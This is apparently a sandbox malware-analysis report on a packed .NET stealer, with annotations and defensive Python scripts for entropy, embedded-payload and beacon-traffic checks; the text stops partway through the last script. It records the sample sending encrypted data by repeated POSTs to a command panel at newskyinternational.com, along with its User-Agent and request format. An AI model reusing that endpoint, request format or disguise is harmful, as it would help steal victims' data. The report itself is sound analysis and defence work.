Analysis type | VM label | Start time | End time | Duration |
---|---|---|---|---|
File (Windows) | win7-sp1-x64-shaapp01-1 | 2018-07-20 20:07:05 | 2018-07-20 20:09:29 | 144 s |
File name | server.exe |
---|---|
File size | 376320 bytes |
File type | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5 | 949755b8f6a4f52d5fd2f112ecb1ed00 |
SHA1 | 0ce5112bdff5a2e9190d8e2a8c2f3e248379dd2b |
SHA256 | aa7fdcc43458b2675b42c4c8a58bcb088745124d6c81d8e2d712ff9ac9aba20d |
SHA512 | 4d5886dd37875d68897c634b52925008da3c37a1016ab56e65b2da5f425a0a732f72cc2fa47cb24950956d94cf77d3bf9abbecbe6b3b5e8517d6422a0dd27bf9 |
CRC32 | C73EB523 |
Ssdeep | 6144:Xf+rYqtV7UW6kVB1RUNmMBME34m7IJl1:mYqtV7UWndRUcSa1 |
Direct | IP | Safety rating | Geolocation |
---|---|---|---|
No | 162.241.225.102 | | United States |
No | 162.88.100.200 | | United States |
Domain | Safety rating | Response |
---|---|---|
checkip.dyndns.org | | CNAME checkip.dyndns.com; A 131.186.113.135, 162.88.100.200, 216.146.43.71, 131.186.113.136, 216.146.38.70, 162.88.96.194 |
newskyinternational.com | Unknown | A 162.241.225.102 |
Image base | 0x00400000 |
---|---|
Entry point | 0x004349ce |
Claimed checksum | 0x00000000 |
Actual checksum | 0x00060252 |
Minimum OS version | 4.0 |
Compile time | 2018-07-10 02:27:45 |
Import hash | f34d5f2d4577ed6d9ceec516c1f5a744 |
Icon exact hash | c4cca15f3b1016361fccea63e54470e6 |
Icon similarity hash | dba668c6e0835c285516a4ab815b014e |
Name | Virtual address | Virtual size | Raw data size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x000329d4 | 0x00032a00 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 7.99 |
.rsrc | 0x00036000 | 0x00028e7c | 0x00029000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 3.11 |
.reloc | 0x00060000 | 0x0000000c | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ | 0.10 |
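The .text entropy of 7.99 bits per byte sits at the 8.0 ceiling. Compiled code, MSIL included, normally lands well below 7, so the code section is encrypted or compressed and is only unpacked at run time; that is what the MSIL/Kryptik and Win.Packed.Razy names in the antivirus results refer to. The zero claimed checksum, by contrast, is common for non-driver binaries and is not an indicator on its own. The script below is an added example, not part of the Maldun report: it walks a PE section table, computes per-section Shannon entropy and flags executable sections at or above a 7.0 threshold. The minimal PE32 it builds is a constructed fixture, and the threshold is a rule of thumb rather than a value from the report.

```python
import math
import random
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
PACKED_THRESHOLD = 7.0   # bits per byte; heuristic cut-off, not a value from the report


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for constant data, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_entropies(pe):
    """Walk the PE section table; return [(name, characteristics, raw_size, entropy)]."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                              # IMAGE_FILE_HEADER
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    first = coff + 20 + opt_size                     # IMAGE_SECTION_HEADER[0]
    rows = []
    for i in range(n_sections):
        (name, _vsize, _va, raw_size, raw_ptr,
         _r, _l, _nr, _nl, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, first + 40 * i)
        body = pe[raw_ptr:raw_ptr + raw_size]
        rows.append((name.rstrip(b"\0").decode("ascii", "replace"),
                     chars, raw_size, shannon_entropy(body)))
    return rows


def packed_code_sections(pe):
    """Names of executable sections whose bytes look encrypted or compressed."""
    return [name for name, chars, _size, ent in section_entropies(pe)
            if chars & IMAGE_SCN_MEM_EXECUTE and ent >= PACKED_THRESHOLD]


def build_sample_pe():
    """Constructed fixture: minimal PE32 with a high-entropy .text and an all-zero .rsrc."""
    rng = random.Random(2018)                        # deterministic stand-in for packed code
    text = bytes(rng.getrandbits(8) for _ in range(4096))
    rsrc = b"\0" * 2048
    header_len = 0x40 + 4 + 20 + 224 + 40 * 2        # DOS + "PE\0\0" + COFF + PE32 optional + 2 sections
    data_start = -(-header_len // 0x200) * 0x200     # round up to a 0x200 FileAlignment
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew at offset 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * 222          # PE32 magic, rest zeroed

    def sec(name, va, size, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, ptr, 0, 0, 0, 0, chars)

    headers = (dos + b"PE\0\0" + coff + optional
               + sec(b".text", 0x2000, len(text), data_start, 0x60000020)
               + sec(b".rsrc", 0x4000, len(rsrc), data_start + len(text), 0x40000040))
    return headers.ljust(data_start, b"\0") + text + rsrc


if __name__ == "__main__":
    sample = build_sample_pe()
    for name, chars, size, ent in section_entropies(sample):
        print(f"{name:<8} raw={size:#08x} chars={chars:#010x} entropy={ent:.2f}")
    print("likely packed code sections:", packed_code_sections(sample))
```

Run it against a real file by replacing `build_sample_pe()` with the bytes of the sample; a managed assembly whose only executable section scores above 7 is the case this report shows.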
Name | Offset | Size | Language | Sublanguage | Entropy | File type |
---|---|---|---|---|---|---|
RT_ICON (the report lists this entry 23 times with identical values; RT_GROUP_ICON declares 23 icons) | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_GROUP_ICON | 0x0005e914 | 0x00000148 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.37 | MS Windows icon resource - 23 icons, 32x32, 16 colors |
RT_VERSION | 0x0005ea5c | 0x00000233 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.31 | ASCII text, with CRLF line terminators |
RT_MANIFEST | 0x0005ec90 | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.00 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |
Assembly name | server |
---|---|
Assembly version | 14.18.10.14 |
Referenced assembly | Version |
---|---|
mscorlib | 4.0.0.0 |
Microsoft.VisualBasic | 10.0.0.0 |
System | 4.0.0.0 |
Type | Name | Value |
---|---|---|
Property | [System]System.ComponentModel.Design.HelpKeywordAttribute | My.Comput |
Assembly | [mscorlib]System.Reflection.AssemblyCompanyAttribute | Family Dollar Stores In |
Assembly | [mscorlib]System.Reflection.AssemblyCopyrightAttribute | (c) 2016 Family Dollar Stores In |
Assembly | [mscorlib]System.Reflection.AssemblyDescriptionAttribute | Family Dollar Stores Inc. Hiipo R |
Assembly | [mscorlib]System.Reflection.AssemblyTitleAttribute | Family Dollar Stores In |
Assembly | [mscorlib]System.Reflection.AssemblyFileVersionAttribute | 7.14.13 |
Assembly | [mscorlib]System.Reflection.AssemblyProductAttribute | Family Dollar Stores Inc. Hiipo R |
Property | [System]System.ComponentModel.Design.HelpKeywordAttribute | My.Applicati |
Property | [System]System.ComponentModel.Design.HelpKeywordAttribute | My.Us |
Assembly | Type name |
---|---|
Microsoft.VisualBasic | Microsoft.VisualBasic.ApplicationServices.ApplicationBase |
Microsoft.VisualBasic | Microsoft.VisualBasic.ApplicationServices.User |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.Conversions |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.NewLateBinding |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.Operators |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.StandardModuleAttribute |
Microsoft.VisualBasic | Microsoft.VisualBasic.Devices.Computer |
Microsoft.VisualBasic | Microsoft.VisualBasic.HideModuleNameAttribute |
Microsoft.VisualBasic | Microsoft.VisualBasic.MyGroupCollectionAttribute |
System | System.CodeDom.Compiler.GeneratedCodeAttribute |
System | System.ComponentModel.Design.HelpKeywordAttribute |
System | System.ComponentModel.EditorBrowsableAttribute |
System | System.ComponentModel.EditorBrowsableState |
System | System.IO.Compression.CompressionMode |
System | System.IO.Compression.GZipStream |
mscorlib | System.Activator |
mscorlib | System.Boolean |
mscorlib | System.Byte |
mscorlib | System.Convert |
mscorlib | System.Diagnostics.DebuggerHiddenAttribute |
mscorlib | System.IDisposable |
mscorlib | System.IO.MemoryStream |
mscorlib | System.IO.Stream |
mscorlib | System.Int32 |
mscorlib | System.IntPtr |
mscorlib | System.Object |
mscorlib | System.Reflection.Assembly |
mscorlib | System.Reflection.AssemblyCompanyAttribute |
mscorlib | System.Reflection.AssemblyCopyrightAttribute |
mscorlib | System.Reflection.AssemblyDescriptionAttribute |
mscorlib | System.Reflection.AssemblyFileVersionAttribute |
mscorlib | System.Reflection.AssemblyProductAttribute |
mscorlib | System.Reflection.AssemblyTitleAttribute |
mscorlib | System.Resources.ResourceManager |
mscorlib | System.Runtime.CompilerServices.CompilationRelaxationsAttribute |
mscorlib | System.Runtime.CompilerServices.CompilerGeneratedAttribute |
mscorlib | System.Runtime.CompilerServices.RuntimeCompatibilityAttribute |
mscorlib | System.Runtime.CompilerServices.RuntimeHelpers |
mscorlib | System.Runtime.InteropServices.ComVisibleAttribute |
mscorlib | System.Runtime.InteropServices.DllImportAttribute |
mscorlib | System.Runtime.InteropServices.Marshal |
mscorlib | System.RuntimeTypeHandle |
mscorlib | System.STAThreadAttribute |
mscorlib | System.ThreadStaticAttribute |
mscorlib | System.Type |
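The type references above contain no HTTP, socket or imaging types at all, yet the sandbox recorded HTTP check-ins and a screenshot. What they do contain is GZipStream, CompressionMode, MemoryStream, Reflection.Assembly, Activator, Marshal and DllImportAttribute: the ingredients of a .NET loader that inflates an embedded blob and loads it from memory, so the observable behaviour lives in a second stage this binary unpacks at run time. The report shows only the referenced types, not the loader code itself. The scanner below is an added example, neither the report's nor the sample's code: it does the analyst-side check statically by locating gzip members by their magic bytes, inflating each under a size cap so a decompression bomb cannot exhaust memory, and reporting members that inflate to a PE image. The carrier blob is constructed; the gzip magic, the CM=8 byte and the MZ/PE checks are format facts.

```python
import gzip
import struct
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"          # ID1, ID2, CM = 8 (deflate): the only method gzip defines
MAX_INFLATED = 64 << 20               # cap per member so a decompression bomb cannot exhaust memory


def find_gzip_members(blob, max_hits=32):
    """Return [(offset, inflated_bytes)] for every complete gzip member found in blob."""
    hits, pos = [], 0
    while len(hits) < max_hits:
        pos = blob.find(GZIP_MAGIC, pos)
        if pos < 0:
            break
        d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)   # expect a gzip wrapper
        try:
            out = d.decompress(blob[pos:], MAX_INFLATED)
        except zlib.error:                                 # magic bytes but not a real member
            pos += 1
            continue
        if d.eof:                                          # whole member consumed, CRC and length verified
            hits.append((pos, out))
            pos = len(blob) - len(d.unused_data)           # resume after the member, not inside it
        else:                                              # truncated, or larger than MAX_INFLATED
            pos += 1
    return hits


def embedded_pe_images(blob):
    """Offsets and inflated sizes of gzip members whose contents are a PE image."""
    found = []
    for off, data in find_gzip_members(blob):
        if data[:2] != b"MZ" or len(data) < 0x40:
            continue
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            found.append((off, len(data)))
    return found


def build_carrier():
    """Constructed fixture: a 'loader' body with one decoy member and one gzip-packed stub PE."""
    stub_pe = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)    # DOS header, e_lfanew = 0x40
               + b"PE\0\0" + b"\0" * 20                         # signature + zeroed COFF header
               + b"second-stage-code-" * 64)
    decoy = gzip.compress(b"just a string resource", mtime=0)
    packed = gzip.compress(stub_pe, mtime=0)
    return b"\0" * 0x120 + decoy + b"\xcc" * 0x40 + packed + b"\0" * 0x20


if __name__ == "__main__":
    carrier = build_carrier()
    for off, data in find_gzip_members(carrier):
        print(f"gzip member at {off:#x}: {len(data)} bytes, starts {data[:4]!r}")
    print("embedded PE images (offset, size):", embedded_pe_images(carrier))
```

On a real sample, feed it the whole file; a hit that sits inside .text or a managed resource and inflates to an MZ image is the second stage to analyse next, and its hashes, not the loader's, are what to pivot on.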
Antivirus engine/vendor | Detection name / rule match | Signature date |
---|---|---|
Bkav | Not detected | 20180719 |
MicroWorld-eScan | Gen:Variant.Razy.360881 | 20180720 |
CMC | Not detected | 20180720 |
CAT-QuickHeal | Not detected | 20180720 |
McAfee | Trojan-FPRM!949755B8F6A4 | 20180720 |
Cylance | Unsafe | 20180720 |
K7AntiVirus | Trojan ( 00533ba61 ) | 20180720 |
K7GW | Trojan ( 00533ba61 ) | 20180720 |
TheHacker | Not detected | 20180720 |
Arcabit | Trojan.Razy.D581B1 | 20180720 |
Invincea | heuristic | 20180717 |
Baidu | Win32.Trojan.WisdomEyes.16070401.9500.9999 | 20180717 |
Babable | Not detected | 20180406 |
F-Prot | Not detected | 20180720 |
Symantec | Trojan.Gen.2 | 20180720 |
ESET-NOD32 | a variant of MSIL/Kryptik.OHR | 20180720 |
TrendMicro-HouseCall | TROJ_GEN.R020C0DGJ18 | 20180720 |
Paloalto | generic.ml | 20180720 |
ClamAV | Win.Packed.Razy-6615989-0 | 20180720 |
Kaspersky | HEUR:Trojan.Win32.Agent.gen | 20180720 |
BitDefender | Gen:Variant.Razy.360881 | 20180720 |
NANO-Antivirus | Trojan.Win32.Kryptik.ffmqvm | 20180720 |
ViRobot | Not detected | 20180720 |
SUPERAntiSpyware | Not detected | 20180720 |
Rising | Not detected | 20180720 |
Ad-Aware | Gen:Variant.Razy.360881 | 20180720 |
Emsisoft | Gen:Variant.Razy.360881 (B) | 20180720 |
Comodo | .UnclassifiedMalware | 20180720 |
F-Secure | Gen:Variant.Razy.360881 | 20180720 |
DrWeb | Trojan.PWS.Stealer.19347 | 20180720 |
VIPRE | Not detected | 20180720 |
TrendMicro | TROJ_GEN.R020C0DGJ18 | 20180720 |
McAfee-GW-Edition | BehavesLike.Win32.Generic.fh | 20180720 |
Sophos | Mal/Generic-S | 20180720 |
Ikarus | Trojan-Spy.Agent | 20180720 |
Cyren | W32/Trojan.WREP-2865 | 20180720 |
Jiangmin | Not detected | 20180720 |
Webroot | Not detected | 20180720 |
Avira | HEUR/AGEN.1025206 | 20180720 |
Antiy-AVL | HackTool[VirTool]/MSIL.Injector | 20180720 |
Kingsoft | Not detected | 20180720 |
Endgame | malicious (high confidence) | 20180711 |
AegisLab | Worm.MSIL.Agent.lmXx | 20180720 |
ZoneAlarm | HEUR:Trojan.Win32.Agent.gen | 20180720 |
Avast-Mobile | Not detected | 20180720 |
GData | Gen:Variant.Razy.360881 | 20180720 |
TACHYON | Not detected | 20180719 |
AhnLab-V3 | Trojan/Win32.Upatre.R231775 | 20180720 |
ALYac | Trojan.Agent.Upatre | 20180720 |
AVware | Not detected | 20180720 |
MAX | malware (ai score=98) | 20180720 |
VBA32 | Not detected | 20180720 |
Malwarebytes | Spyware.AgentTesla | 20180720 |
Panda | Trj/GdSda.A | 20180720 |
Zoner | Not detected | 20180719 |
Tencent | Not detected | 20180720 |
Yandex | Not detected | 20180720 |
SentinelOne | static engine - malicious | 20180701 |
eGambit | Not detected | 20180720 |
Fortinet | MSIL/Kryptik.OHR!tr | 20180720 |
AVG | Win32:GenX | 20180720 |
Cybereason | malicious.bdff5a | 20180225 |
Avast | Win32:GenX | 20180720 |
CrowdStrike | malicious_confidence_100% (D) | 20180530 |
Qihoo-360 | HEUR/QVM03.0.9DB1.Malware.Gen | 20180720 |
Source address | Source port | Destination address (TCP) | Destination port |
---|---|---|---|
192.168.122.201 | 49170 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49171 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49172 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49173 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49174 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49175 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49176 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49177 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49178 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49181 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49182 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49183 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49186 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49187 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49188 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49189 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49190 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49191 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49192 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49193 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49194 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49195 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49197 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49198 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49199 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49202 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49203 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49204 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49205 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49206 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49208 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49209 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49211 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49212 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49213 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49214 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49215 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49216 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49167 | 162.88.100.200 checkip.dyndns.org | 80 |
192.168.122.201 | 49168 | 162.88.100.200 checkip.dyndns.org | 80 |
Source address | Source port | Destination address (UDP) | Destination port |
---|---|---|---|
192.168.122.201 | 52966 | 192.168.122.1 | 53 |
192.168.122.201 | 60990 | 192.168.122.1 | 53 |
URI | HTTP data |
---|---|
http://checkip.dyndns.org/ | GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 286 Expect: 100-continue Connection: Keep-Alive |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 324 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 314 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 314 Expect: 100-continue p=EmZKrUTp3d4tHBRf%2BrVRl83BzwyEp7vTyKfJ0MpC1BYQdNU/LNTV5fVLeLuMBGfNrRlOS1O2B8w0m/iQBuFuE1/ibaMcbAS1d/SUMXDXl8SaFwcUViuVQGbg1R03ncZet2f%2BR2i%2BmeoTKIUeUXT6tBGeNAa5WQqUVdlYP4LTrR9hTgOk4BYWOSchAPQ9Xhckq%2BIllD7imBU/9mp0pt8DTahIO9aEFcQHO%2BVEv0ohap47biDprqlQqmzpyXEr/M/ZVXllPgf09svD8fSEnRpoQ%2Boir5cZMIx0R5Wu0lWsIZs= |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 288 Expect: 100-continue Connection: Keep-Alive |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 286 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 322 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 66596 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 322 Expect: 100-continue p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1MfbiT8ZuRlRVcMP5xdr99vcMXlBF1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuOzKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q== |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 324 Expect: 100-continue p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1MfbiT8ZymcaUfX9lABOPpU0LBSO%2B1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuOzKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q== |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 66598 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 68174 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 286 Expect: 100-continue p=G1DZYwdIiDZ6V83seaZCmb3lNHQ9jFz9S1trgT9pB0gEhegVG5AXSLq/eNOcoam8PExE/dGbiFbZdI6uJmXlSdqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDfxk7Bq%2BMPIeFuYVGUohcCs= |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 68156 Expect: 100-continue |
http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 326 Expect: 100-continue |
No SMTP traffic.
No IRC requests.
No ICMP traffic.
No CIF results.
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2018-07-20 20:07:24.400670+0800 | 192.168.122.201 | 49168 | 162.88.100.200 | 80 | TCP | 2021378 | ET POLICY External IP Lookup - checkip.dyndns.org | Potential Corporate Privacy Violation |
2018-07-20 20:07:23.913079+0800 | 192.168.122.201 | 49167 | 162.88.100.200 | 80 | TCP | 2021378 | ET POLICY External IP Lookup - checkip.dyndns.org | Potential Corporate Privacy Violation |
No TLS
No Suricata HTTP
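The HTTP and Suricata sections together show the check-in pattern: one GET to checkip.dyndns.org (ET POLICY SID 2021378, public-IP discovery before the first beacon), then repeated POSTs to /WebPanel/api.php with a single form field p carrying URL-encoded base64, a fixed User-Agent, and Expect: 100-continue. The Gecko build rv:1.9.2.3 is the Firefox 3.6 engine, so the Firefox/4.0 token behind it is a hand-written, internally inconsistent string that no real browser sends. Two POSTs of roughly 66 and 68 KB stand out against the 286 to 326 byte check-ins; the report does not decode the bodies, but they are the obvious place where bulk data such as the 800x600 screenshot dropped under AppData\Roaming\ScreenShot\ would travel. The captured p= values also say something about the crypto: the 322- and 324-byte bodies decode to the same 232 bytes except for bytes 72 to 87, two whole 8-byte blocks, and every block after them is unchanged. CBC would propagate a plaintext change to every following block, so the scheme is ECB-like or reuses a keystream, and the decoded lengths (224, 232, 232 and 200 bytes) are all multiples of 8, which is consistent with a padded 8-byte-block cipher such as DES/3DES in ECB mode. The report does not identify the cipher; the practical consequence is that fields that do not change between check-ins encrypt identically and the variable fields can be located by diffing. The classifier below is an added example, not code from the report: it parses the captured POST and GET plus a constructed benign request, scores them on those indicators, and diffs the two near-identical captured bodies. The thresholds and verdict labels are this example's own.

```python
import base64
import urllib.parse

# User-Agent captured in the report's POSTs. Gecko rv:1.9.2.x is the Firefox 3.6
# engine, so the trailing "Firefox/4.0" is an inconsistent hand-written string.
STATIC_UA = ("Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) "
             "Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)")

# Complete POST bodies copied from the report's HTTP table, keyed by Content-Length.
BODIES = {
    314: "p=EmZKrUTp3d4tHBRf%2BrVRl83BzwyEp7vTyKfJ0MpC1BYQdNU/LNTV5fVLeLuMBGfNrRlOS1O2B8w0m/iQBuFuE1/i"
         "baMcbAS1d/SUMXDXl8SaFwcUViuVQGbg1R03ncZet2f%2BR2i%2BmeoTKIUeUXT6tBGeNAa5WQqUVdlYP4LTrR9hTg"
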